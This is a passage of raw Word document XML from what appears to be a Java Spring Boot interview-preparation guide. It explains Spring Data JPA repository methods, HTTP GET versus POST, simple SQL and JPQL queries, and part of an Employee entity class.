          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6925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Controller handles the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCDAA8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RequestBody annotation converts the JSON request body into a Product object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C14C8E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Service calls the productRepository.save() method to persist the product in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646C0C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 entity is persisted into the corresponding product table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201A090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troller returns the saved Product along with a 201 Created status code to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D956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atabase Operations with Spring Data JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E5554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ave()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Saves a new entity or updates an existing entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E04DF6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Id()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retrieves an entity by its ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFB5A1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All()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retrieves all entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BD19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ById()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Deletes an entity by its ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1590AC8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w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can define custom query methods in the repository using Spring Data JPA's derived query method naming convention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A381E5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05F10B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593" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B354A5" w14:textId="3BFD4842" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00681982">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="617" w:name="_Toc197867831"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain GET and POST methods</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="617"/>
    </w:p>
    <w:p w14:paraId="7CD6355D" w14:textId="696B9975"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 Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CA30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e GET method is used to retrieve data from the server. It is the most commonly used HTTP method for fetching resources or data from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B20C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xml:space="preserve">: GET requests are </w:t>
      </w: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meaning that making multiple identical requests will always return the same result without any side effects. It does not modify any resources on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7495E74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r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: GET requests can be cached, meaning that repeated requests for the same resource might return the cached response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D6A72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URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The data in a GET request is usually passed as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>query parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the URL (e.g., ?key1=value1&amp;key2=value2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D634B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Because the data is in the URL, it is visible to anyone who has access to the URL, making it unsuitable for sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B226C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imits</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: There is a size limitation for the data in the URL (depending on the browser or server). Typically, the URL length can be around 2000 characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678589C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902DAE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list of products: GET /api/products</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D949A52"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specific product by ID: GET /api/products/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F123CA"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 Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F6DAB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The POST method is used to send data to the server to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>create</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it</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> new resources or perform operations that might have side effects. Unlike GET, it is used to send data to the server for processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A31929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xml:space="preserve">: POST requests are </w:t>
      </w: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meaning that multiple identical requests can result in different outcomes (e.g., creating multiple instances of a resource).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD2A61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Body</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The data is sent in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the request, rather than in the URL. This makes it suitable for sending larger amounts of data or more complex data structures (e.g., JSON or XML).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E39BEE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Since the data is in the body, it is not visible in the URL and thus can be used for sending sensitive information, like login credentials or payment details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485C9C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Size Limits</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The data in a POST request is not limited by URL length, so you can send larger data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E7D2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F764D15"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a new product: POST /api/products</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4877DE7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ting a form: POST /api/formSubmit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399E722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4765"/>
        <w:gridCol w:w="3605"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="45D86B90" w14:textId="77777777" w:rsidTr="008105B8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E8DB309"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6D1A1F95"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E3A83A1"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="7073BE4D" w14:textId="77777777" w:rsidTr="008105B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AA356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073532F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e data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EEFCC0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 data to be processed or created</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="2DB973EE" w14:textId="77777777" w:rsidTr="008105B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="235876E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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13D72BC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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40B653C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non-idempotent)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="06B8C153" w14:textId="77777777" w:rsidTr="008105B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EA13B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Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A7415E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ssed in the URL as query parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="627A3E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nt in the request body</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="60FF76D1" w14:textId="77777777" w:rsidTr="008105B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78DD40B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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B08120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cached</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FA892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ually not cached</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="37FE1971" w14:textId="77777777" w:rsidTr="008105B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="437E1A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ze Limit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57C799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imited by the URL length (typically 2000 characters)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F4BBF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size limit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="25E26B6A" w14:textId="77777777" w:rsidTr="008105B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A22E7A2"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 Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="181CF4B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ing data or resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29E3DEA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updating, or submitting data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A3F8FC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methods are essential in RESTful web services. GET is used for safe, read-only requests, while POST is for creating or submitting data, often resulting in a state change on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0125189E" w14:textId="0901204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594" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57690543" w14:textId="461BCDAE" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00A53E99">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="618" w:name="_Toc197867832"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Write a SQL or JPQL to retrieve the data from DB</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="618"/>
    </w:p>
    <w:p w14:paraId="684DCE2E" w14:textId="62D2A919"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Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEBAA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retrieve data from a database using SQL, you would typically use the SELECT statement. Here's a simple example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEEE1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 FROM employees WHERE department = 'Sales';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694D77DC"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SQL query retrieves all records from the employees table where the department is 'Sales'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFC3213"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Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7519E61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PQL (Java Persistence Query Language) is similar to SQL but operates on entities, not directly on database tables. Here's an example of a JPQL query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9D868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 FROM Employee e WHERE e.department = 'Sales'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3ED8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both cases, you can also specify which fields (or columns) to retrieve, add ordering, limit results, and more, depending on your needs. Here's how you could do it for both:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D46AB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with specific fields:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570E3E4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name, age FROM employees WHERE department = 'Sales';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5878F1AE"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with specific fields:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DC74A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name, e.age FROM Employee e WHERE e.department = 'Sales'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E741FB5"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QL and JPQL allow you to retrieve data based on conditions, and they are used in different contexts, with SQL interacting directly with the database and JPQL with JPA entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D811C87" w14:textId="1724946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595" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A7FCAB" w14:textId="6764AAF1" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="0026420D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="619" w:name="_Toc197867833"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will you add Employee object data in the DB using POST call</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="619"/>
    </w:p>
    <w:p w14:paraId="58538DC9" w14:textId="2959EC8F" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82"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add an Employee object to the database using a POST request in a Spring Boot application, you need to do the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18732A4B"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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152A43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the Employee Entity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You need an entity class to map the Employee object to a table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117257A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6A99706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1B7A8F0B" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47CE48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4FB1D7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7496EF37" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D64163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3B4A13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239A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6DD11AE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0A013D3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salary;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9592FC" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4134B5F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E36D99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ong getId() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3945790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id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3940C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A678E3" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0178452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Id(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E01B4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id = id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2283AD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B101B9" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119BF04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265D6DA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69441FF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8B3C71" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799AA29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Name(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5CC8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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9739B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8D4CD0" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39C897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Department() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6F0EE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department;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429B8BF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552040" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30C326D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Department(String department) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B50B8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department = department;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4187E73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5BE63DB" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44097C7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double getSalary() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF9762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alary;</w:t>
      </w:r>
    </w:p>
